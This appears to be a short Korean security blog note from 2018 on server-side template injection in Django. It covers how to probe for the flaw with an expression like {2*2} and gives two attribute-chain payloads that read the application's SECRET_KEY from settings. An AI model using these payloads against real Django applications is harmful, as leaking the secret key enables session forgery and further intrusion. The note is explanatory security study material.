-
0x01.Django SSTI0x.Web 2018. 11. 21. 12:22
0x01.Django SSTI
템플릿 렌더링을 잘못 사용하였을 경우에 발생
{ 2*2 } 와 같은 값을 넣어 해당 결과가 어떻게 출력되는지를 확인함으로써 가능성을 판단
settings.py 의 변수에 접근하는 2가지 방법
{user.groups.model._meta.app_config.module.admin.settings.SECRET_KEY}
{user.user_permissions.model._meta.app_config.module.admin.settings.SECRET_KEY}
해당 방식은 장고 프레임워크의 특성상 models.py를 거치기 때문에 결국 연결고리가 존재하기 마련. 최근에는 패치된 취약점..
'0x.Web' 카테고리의 다른 글
0x00.Injection Sheet (0) 2018.01.10 댓글